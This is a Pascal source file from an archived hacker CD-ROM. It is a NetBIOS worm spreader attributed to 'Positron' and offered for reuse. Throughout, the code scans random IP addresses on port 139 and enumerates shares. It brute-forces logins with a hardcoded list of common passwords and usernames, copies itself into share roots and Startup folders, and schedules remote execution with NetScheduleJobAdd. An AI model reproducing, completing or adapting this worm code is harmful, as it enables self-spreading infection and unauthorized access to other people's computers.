home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 15 / hacker15 / 15_H4CK3R#15.ISO / virus / cissi / NetBIOS.pas < prev    next >
Encoding:
Pascal/Delphi Source File  |  2004-01-29  |  15.2 KB  |  399 lines
  1. {***********************************************************************}
  2. {  NetBIOS Spreader 0.4 by Positron                                     }
  3. {  URL: http://www.virustrading.com/positron                            }
  4. {                                                                       }
  5. {  Tested on Windows XP. Write me if you find any error in the code!    }
  6. {                                                                       }
  7. {  If you use this source then you must credit Positron. You can freely }
  8. {  use this source in NON-Commercial applications.                      }
  9. {                                                                       }
  10. {  Thanks goes to r-22                                                  }
  11. {                                                                       }
  12. {  Notice:                                                              }
  13. {    You can use ACLUnits and KOL System replacement units if you want  }
  14. {    to make its compiled size smaller.                                 }
  15. {***********************************************************************}
  16. {  History:                                                             }
  17. {     08/08/2003 - First public version (v0.3)                          }
  18. {     10/09/2003 - Some optimalisations (v0.4)                          }
  19. {***********************************************************************}
  20.  
  21. UNIT NetBIOS;
  22.  
  23. INTERFACE
  24.  
  25. {$DEFINE Debug}
  26.  
  27. PROCEDURE StartNetBIOS;
  28.  
  29. IMPLEMENTATION
  30.  
  31. USES
  32.   Windows, WinSock, WinInet, main;
  33.  
  34. VAR
  35.   n_report : Boolean;
  36.   lpNetApiBufferFree  : FUNCTION(VAR Buffer) : DWORD;STDCALL;
  37.   lpNetRemoteTOD      : FUNCTION(UNCServerName:pChar;BufferPtr:pByte) : DWORD;STDCALL;
  38.   lpNetScheduleJobAdd : FUNCTION(ServerName:pChar;Buffer:pByte;VAR JobID:DWORD) : DWORD;STDCALL;
  39.   OLD_NetShareEnum    : FUNCTION(pszServer:pChar;sLevel:SmallInt;VAR Bufptr;cbBuffer:Cardinal;VAR pcEntriesRead,pcTotalAvail:Cardinal) : DWORD; STDCALL;
  40.   NT_NetShareEnum     : FUNCTION(ServerName:pWideChar;Level:DWORD;VAR Bufptr;Prefmaxlen:DWORD;VAR EntriesRead,TotalEntries,resume_handle:DWORD) : DWORD; STDCALL;
  41.  
  42. CONST
  43.   PREVIOUS_IP              = '2';
  44.   NEXT_IP                  = '1';
  45.   NERR_SUCCESS             = 0;
  46.   MAX_NB_THREAD            = 50;
  47.   MAX_USERNAME             = 4;
  48.   ERROR_ACCESS_DENIED      = 5;
  49.   STYPE_PRINTQ             = 1;
  50.   ERROR_INVALID_PASSWORD   = 86;
  51.   MAX_PASSWORD             = 101;
  52.   ERROR_NO_NET_OR_BAD_PATH = 1203;
  53.   ERROR_LOGON_FAILURE      = 1326;
  54.   lpszPassword  : ARRAY [0..MAX_PASSWORD] OF STRING = (
  55.         '','1234','password','6969','harley','123456','golf','pussy','mustang',
  56.         '1111','shadow','1313','fish','5150','7777','qwerty','baseball','2112',
  57.         'letmein','12345678','12345','ccc','admin','Admin','Password','1','12',
  58.         '123','1234567','123456789','654321','54321','111','000000','abc','pw',
  59.     '11111111','88888888','pass','passwd','database','abcd','abc123','pass',
  60.         'sybase','123qwe','server','computer','Internet','super','123asd','0',
  61.         'ihavenopass','godblessyou','enable','xp','2002','2003','2600','alpha',
  62.         '110','111111','121212','123123','1234qwer','123abc','007','a','aaa',
  63.         'patrick','pat','administrator','root','sex','god','foobar','secret',
  64.         'abc','test','test123','temp','temp123','win','pc','asdf','oracle''pwd',
  65.         'qwer','yxcv','zxcv','home','xxx','owner','login','Login','pw123',
  66.         'love','mypc','mypc123','admin123','mypass','mypass123','901100');
  67.   lpszUserName  : ARRAY [0..MAX_USERNAME] OF STRING = (
  68.         '','Guest','Administrator','Owner','Root');
  69.  
  70. //------------------------------------------------------------------------------
  71. FUNCTION IntToStr(I:Integer) : STRING;
  72. BEGIN
  73.   Str(I,Result);
  74. END;
  75.  
  76. //------------------------------------------------------------------------------
  77. FUNCTION ExtractFileName(CONST FileName:ShortString) : ShortString;
  78. VAR
  79.   I : Integer;
  80. BEGIN
  81.   I:=Length(FileName);
  82.   WHILE (I>=1)AND NOT(FileName[I] IN ['\',':']) DO Dec(I);
  83.   Result:=Copy(FileName,I+1,255);
  84.   IF Result[0]>#0 THEN IF Result[Ord(Result[0])]=#0 THEN Dec(Result[0]);
  85. END;
  86.  
  87. //------------------------------------------------------------------------------
  88. FUNCTION DirectoryExists(CONST Dir:STRING) : BOOL;
  89. VAR
  90.   Attr : DWORD;
  91. BEGIN
  92.   Attr:=GetFileAttributes(pChar(Dir));
  93.   Result:=(Attr<>$FFFFFFFF)AND(Attr AND FILE_ATTRIBUTE_DIRECTORY=FILE_ATTRIBUTE_DIRECTORY);
  94. END;
  95.  
  96. //------------------------------------------------------------------------------
  97. FUNCTION IsNTBasedOS : BOOL;
  98. VAR
  99.   verInfo : TOSVersionInfo;
  100. BEGIN
  101.   Result:=False;
  102.   verInfo.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);
  103.   GetVersionEx(verInfo);
  104.   IF verInfo.dwPlatformId=VER_PLATFORM_WIN32_NT THEN Result:=True;
  105. END;
  106.  
  107. //------------------------------------------------------------------------------
  108. PROCEDURE NetRemoteExecute(szServer,szLocation:STRING);
  109. TYPE
  110.   PTIME_OF_DAY_INFO = ^TTIME_OF_DAY_INFO;
  111.   TTIME_OF_DAY_INFO = RECORD
  112.     tod_elapsedt    : DWORD;
  113.     tod_msecs       : DWORD;
  114.     tod_hours       : DWORD;
  115.     tod_mins        : DWORD;
  116.     tod_secs        : DWORD;
  117.     tod_hunds       : DWORD;
  118.     tod_timezone    : LongInt;
  119.     tod_tinterval   : DWORD;
  120.     tod_day         : DWORD;
  121.     tod_month       : DWORD;
  122.     tod_year        : DWORD;
  123.     tod_weekday     : DWORD;
  124.   END;
  125.   AT_INFO           = RECORD
  126.     JobTime         : DWORD;
  127.     DaysOfMonth     : DWORD;
  128.     DaysOfWeek      : UCHAR;
  129.     Flags           : UCHAR;
  130.     Command         : pWideChar;
  131.   END;
  132. VAR
  133.   JobID        : DWORD;
  134.   dwRemoteTime : DWORD;
  135.   dwReturn     : DWORD;
  136.   NetAT        : AT_INFO;
  137.   wcCmd        : PWideChar;
  138.   wcServer     : PWideChar;
  139.   lpNetTOD     : PTIME_OF_DAY_INFO;
  140. BEGIN
  141.   GetMem(wcCmd,1024+1);
  142.   GetMem(wcServer,256+1);
  143.   lpNetTOD:=NIL;
  144.   {$IFDEF Debug}
  145.     //writeln('[EXECUTE] ADDRESS: '+szServer+' Location: '+szLocation);
  146.   {$ENDIF}
  147.   StringToWideChar(szServer,wcServer,SizeOf(wcServer)+1);
  148.   StringToWideChar(szLocation,wcCmd,SizeOf(wcCmd)+1);
  149.   dwReturn:=lpNetRemoteTOD(pChar(wcServer),@lpNetTOD);
  150.   IF dwReturn=NERR_Success THEN BEGIN
  151.     //* add 2 minutes to current time
  152.     dwRemoteTime:=(lpNetTOD.tod_hours*3600+lpNetTOD.tod_mins*60+lpNetTOD.tod_secs)*1000+lpNetTOD.tod_hunds*10;
  153.     IF lpNetTOD.tod_timezone<>-1 THEN dwRemoteTime:=dwRemoteTime-lpNetTOD.tod_timezone*60000;
  154.     dwRemoteTime:=dwRemoteTime+(2*60)*1000;                                     //* add two minutes to current remote time
  155.     IF IsNTBasedOS THEN lpNetApiBufferFree(lpNetTOD);
  156.     FillChar(NetAT,0,SizeOf(NetAT));
  157.     NetAT.JobTime:=dwRemoteTime;
  158.     NetAT.Command:=@wcCmd;
  159.     dwReturn:=lpNetScheduleJobAdd(pChar(wcServer),@NetAT,JobID);
  160.     {$IFDEF Debug}
  161.       //writeln('[ERROR] NetScheduleJobAdd(): '+IntToStr(dwReturn));
  162.     {$ENDIF}
  163.   END;
  164.   FreeMem(wcCmd);
  165.   FreeMem(wcServer);
  166. END;
  167.  
  168. //------------------------------------------------------------------------------
  169. FUNCTION InfectSharedResource(szRemoteName,szRemoteUNC:STRING) : BOOL;
  170. LABEL
  171.   Next;
  172. VAR
  173.   I             : DWORD;
  174.   dwRet         : DWORD;
  175.   szLocation    : STRING;
  176.   szFullPath    : STRING;
  177.   bCopy2        : BOOL;
  178.   nK            : Integer;
  179.   nL            : Integer;
  180.   nN            : Integer;
  181.   lpszFileName  : pWideChar;
  182.   NetResource   : TNetResource;
  183.   NetResource2  : TNetResource;
  184.   MaxUserName   : WORD;
  185.   MaxPassword   : WORD;
  186. CONST
  187.   PathSize      = 4;
  188.   Path          : ARRAY[1..PathSize] OF STRING =(
  189.                       '\',
  190.                       '\Documents and Settings\All Users\Start Menu\Programs\Startup\',
  191.                       '\WINDOWS\Start Menu\Programs\Startup\',
  192.                       '\WINNT\Profiles\All Users\Start Menu\Programs\Startup\');
  193. BEGIN
  194.   Result:=False;
  195.   bCopy2:=False;
  196.   szRemoteName:=szRemoteUNC+'\'+szRemoteName;
  197.   NetResource.dwType:=RESOURCETYPE_DISK;
  198.   NetResource.lpLocalName:=NIL;
  199.   NetResource.lpRemoteName:=pChar(szRemoteName);
  200.   NetResource.lpProvider:=NIL;
  201.   lpszFileName:=NIL;
  202.   GetModuleFileName(GetModuleHandle(0),pChar(szFullPath),Length(szFullPath));
  203.   lpszFileName:=pWideChar(string(ExtractFilename(szFullPAth)));
  204.   IF IsNTBasedOS THEN BEGIN
  205.     MaxUserName:=MAX_USERNAME;
  206.     MaxPassword:=MAX_PASSWORD;
  207.   END ELSE BEGIN
  208.     MaxUserName:=0;
  209.     MaxPassword:=0;
  210.   END;
  211.   FOR nK:=0 TO MaxUserName DO BEGIN
  212.     FOR nL:=0 TO MaxPassword DO BEGIN
  213.       {$IFDEF Debug}
  214. //    sendmsg('[SCANNING] Remote Path: '+NetResource.lpRemoteName+' User: '+lpszUserName[nK]+' Pass: '+lpszPassWord[nL]);
  215.       {$ENDIF}
  216.       dwRet:=WNetAddConnection2(NetResource,pChar(lpszPassword[nL]),pChar(lpszUserName[nK]),0);
  217.       {$IFDEF Debug}
  218.       CASE dwRet OF
  219. //        ERROR_ACCESS_DENIED      : //writeln('Error: Acces Denied');
  220. //        ERROR_INVALID_PASSWORD   : //writeln('Error: Invalid Password');
  221.         ERROR_NO_NET_OR_BAD_PATH : Exit;
  222. //        ERROR_LOGON_FAILURE      : //writeln('Logon failure: unknown user name or bad password.');
  223. //        ELSE //writeln('Error Code: '+IntToStr(dwRet));
  224.       END;
  225.       //writeln;
  226.       {$ENDIF}
  227.       IF dwRet=NO_ERROR THEN BEGIN
  228.         FOR I:=1 TO PathSize DO BEGIN
  229.           IF I=1 THEN BEGIN                                                     // Copy file to root dir of shared resource
  230.             IF DirectoryExists(szRemoteName)AND(NOT BCopy2) THEN BEGIN
  231.               bCopy2:=CopyFile(pChar(ParamStr(0)),pChar(szRemoteName+'\Xi.exe'),False);
  232.               IF NOT bCopy2 THEN GOTO Next;
  233.               Result:=True;
  234.               IF IsNTBasedOS THEN NetRemoteExecute(szRemoteUNC,'Xi.exe');
  235.               {$IFDEF Debug}
  236.               sendmsg('[COPYED] From: '+ParamStr(0)+' To: '+NetResource.lpRemoteName+'\Xi.exe');
  237.               {$ENDIF}
  238.             END;
  239.           END ELSE BEGIN                                                        // Copy files to startup dirs
  240.             IF DirectoryExists(NetResource.lpRemoteName+Path[I]) THEN BEGIN
  241.               IF CopyFile(pChar(ParamStr(0)),pChar(szRemoteName+Path[I]+'Setup.exe'),False) THEN BEGIN
  242.                 {$IFDEF Debug}
  243.                  sendmsg('[COPYED] From: '+ParamStr(0)+' To: '+NetResource.lpRemoteName+Path[I]+'Setup.exe');
  244.                 {$ENDIF}
  245.                 FOR nN:=0 TO 20 DO IF WnetCancelConnection(NetResource.lpRemoteName,True)=NO_ERROR THEN Exit;
  246.                 Result:=True;
  247.                 Exit;
  248.               END;
  249.             END;
  250.           END;
  251.         END;
  252.         Next:
  253.         FOR nN:=0 TO 20 DO IF WnetCancelConnection(NetResource.lpRemoteName,True)=NO_ERROR THEN Break;
  254.         {$IFDEF Debug}
  255. //          writeln('[DISCONNECTED] Remote Path: '+NetResource.lpRemoteName+#13#10+
  256. //                  ' User: '+lpszUserName[nK]+#13#10+
  257. //                  ' Pass: '+lpszPassword[nL]);
  258.         {$ENDIF}
  259.       END;
  260.     END;
  261.   END;
  262. END;
  263.  
  264. //------------------------------------------------------------------------------
  265. FUNCTION EnumShare(szRemoteAddr:STRING) : BOOL;
  266. TYPE
  267.   Share_INFO_1   = RECORD
  268.     shi1_netname : PWideChar;
  269.     shi1_type    : DWORD;
  270.     shi1_remark  : LPTSTR;
  271.   END;
  272.   LPShare_INFO_1 =^Share_INFO_1;
  273. VAR
  274.   dwK            : DWORD;
  275.   hResume        : DWORD;
  276.   dwReturn       : DWORD;
  277.   dwReadEntires  : DWORD;
  278.   dwTotalEntires : DWORD;
  279.   szShareName    : STRING;
  280.   wcRemoteAddr   : pWideChar;
  281.   lpShareInfo    : LPSHARE_INFO_1;
  282.   lpCurrentInfo  : LPSHARE_INFO_1;
  283. BEGIN
  284.   Result:=False;
  285.   GetMem(wcRemoteAddr,MAX_PATH+10);
  286.   StringToWideChar(szRemoteAddr,wcRemoteAddr,MAX_PATH+10);
  287.   hResume:=0;
  288.   REPEAT
  289.     lpShareInfo:=NIL;
  290.     IF IsNTBasedOS THEN dwReturn:=NT_NetShareEnum(wcRemoteAddr,1,lpShareInfo,8192,dwReadEntires,dwTotalEntires,hResume)
  291.      ELSE dwReturn:=OLD_NetShareEnum(pChar(wcRemoteAddr),1,lpShareInfo,8192,dwReadEntires,dwTotalEntires);
  292.     IF(dwReturn<>ERROR_MORE_DATA)AND(dwReturn<>ERROR_SUCCESS) THEN Break;
  293.     lpCurrentInfo:=lpShareInfo;
  294.     FOR dwK:=0 TO dwReadEntires-1 DO BEGIN
  295.       szShareName:=lpCurrentInfo.shi1_netname;
  296.       {$IFDEF Debug}
  297.         //writeln('[SHARE] Server: '+szRemoteAddr+' Share: '+szShareName);
  298.       {$ENDIF}
  299.       IF lpcurrentinfo.shi1_type<>STYPE_PRINTQ THEN Result:=InfectSharedResource(szShareName,szRemoteAddr);
  300.       Inc(lpCurrentInfo);
  301.     END;
  302.     IF IsNTBasedOS THEN lpNetAPIBufferFree(lpShareInfo);
  303.   UNTIL dwReturn<>ERROR_MORE_DATA;
  304.   FreeMem(wcRemoteAddr);
  305. END;
  306.  
  307. //------------------------------------------------------------------------------
  308. PROCEDURE GetRandomIP(VAR szIPAddr:STRING;VAR NIPAddrA,NIPAddrB,NIPAddrC,NIPAddrD:WORD);
  309. BEGIN
  310.   IF szIPAddr='' THEN BEGIN
  311.     nIPAddrA:=Random(254)+1;
  312.     nIPAddrB:=Random(254)+1;
  313.     nIPAddrC:=Random(254)+1;
  314.     nIPAddrD:=Random(254)+1;
  315.   END;
  316.   IF(szIPAddr=NEXT_IP)AND(nIPAddrD<255)THEN Inc(nIPAddrD);
  317.   IF(szIPAddr=PREVIOUS_IP)AND(nIPAddrD>2)THEN Dec(nIPAddrD,2);
  318.   szIPAddr:=IntToStr(nIPAddrA)+'.'+IntToStr(nIPAddrB)+'.'+IntToStr(nIPAddrC)+'.'+IntToStr(nIPAddrD);
  319. END;
  320.  
  321. //------------------------------------------------------------------------------
  322. PROCEDURE InfectNetBIOS;
  323. VAR
  324.   szIPAddr      : STRING;
  325.   Sock          : TSocket;
  326.   SockAddr      : TSockAddrIn;
  327.   IPA           : WORD;
  328.   IPB           : WORD;
  329.   IPC           : WORD;
  330.   IPD           : WORD;
  331.   R             : BOOL;
  332. BEGIN
  333.   R:=False;
  334.   szIPAddr:='';
  335.   WHILE True DO BEGIN
  336.     IF R=True THEN BEGIN
  337.       IF szIPAddr=PREVIOUS_IP THEN szIPAddr:='' ELSE BEGIN
  338.         IF szIPAddr=NEXT_IP THEN szIPAddr:=PREVIOUS_IP;
  339.         IF szIPAddr='' THEN szIPAddr:=NEXT_IP;
  340.       END;
  341.     END ELSE szIPAddr:='';
  342.     GetRandomIP(szIPAddr,IPA,IPB,IPC,IPD);
  343.     {$IFDEF Debug}
  344.     if n_report then
  345.     sendmsg('[SCANNING] Addres: '+szIPAddr+' Port: 139');
  346.     {$ENDIF}
  347.  
  348.     Sock:=Socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  349.     SockAddr.sin_family:=AF_INET;
  350.     SockAddr.sin_port:=htons(139);
  351.     SockAddr.sin_addr.S_addr:=inet_addr(pChar(szIPAddr));
  352.     IF connect(Sock,SockAddr,SizeOf(SockAddr))<>SOCKET_ERROR THEN BEGIN
  353.       {$IFDEF Debug}
  354.       //writeln('[SCANNED] Address: '+szIPAddr+' Port: 139 State: Open');
  355.       {$ENDIF}
  356.       CloseSocket(Sock);
  357.       R:=EnumShare('\\'+szIPAddr);
  358.     END ELSE BEGIN
  359.       {$IFDEF Debug}
  360.         //writeln('[SCANNED] Address: '+szIPAddr+' Port: 139 State: Closed');
  361.       {$ENDIF}
  362.       CloseSocket(Sock);
  363.     END;
  364.  
  365.     Sleep(512);
  366.   END;
  367. END;
  368.  
  369. //------------------------------------------------------------------------------
  370. PROCEDURE InitNETAPIFunctions;
  371. VAR
  372.   NETAPI32 : Thandle;
  373. BEGIN
  374.   NETAPI32:=LoadLibrary('netapi32.dll');
  375.   lpNetRemoteTOD:=GetProcAddress(NETAPI32,'NetRemoteTOD');
  376.   lpNetScheduleJobAdd:=GetProcAddress(NETAPI32,'NetScheduleJobAdd');
  377.   IF IsNTBasedOS THEN BEGIN
  378.     NT_NetShareEnum:=GetProcAddress(NETAPI32,'NetShareEnum');
  379.     lpNetAPIBufferFree:=GetProcAddress(NETAPI32,'NetApiBufferFree');
  380.   END ELSE OLD_NetShareEnum:=GetProcAddress(NETAPI32,'NetShareEnum');
  381. END;
  382.  
  383. //------------------------------------------------------------------------------
  384. PROCEDURE StartNetBIOS;
  385. VAR
  386.   Msg      : TMsg;
  387.   I        : WORD;
  388.   ThreadID : DWORD;
  389. BEGIN
  390.   WHILE NOT InternetGetConnectedState(NIL,0) DO Sleep(1000);                    //Wait for Internet connection
  391.   Randomize;
  392.   InitNETAPIFunctions;
  393.   FOR I:=0 TO MAX_NB_THREAD DO CreateThread(NIL,0,@InfectNetBios,NIL,I,ThreadID);
  394.   WHILE GetMessage(Msg,0,0,0) DO DispatchMessage(Msg);                          //Make application resident
  395. END;
  396.  
  397. END.
  398.  
  399.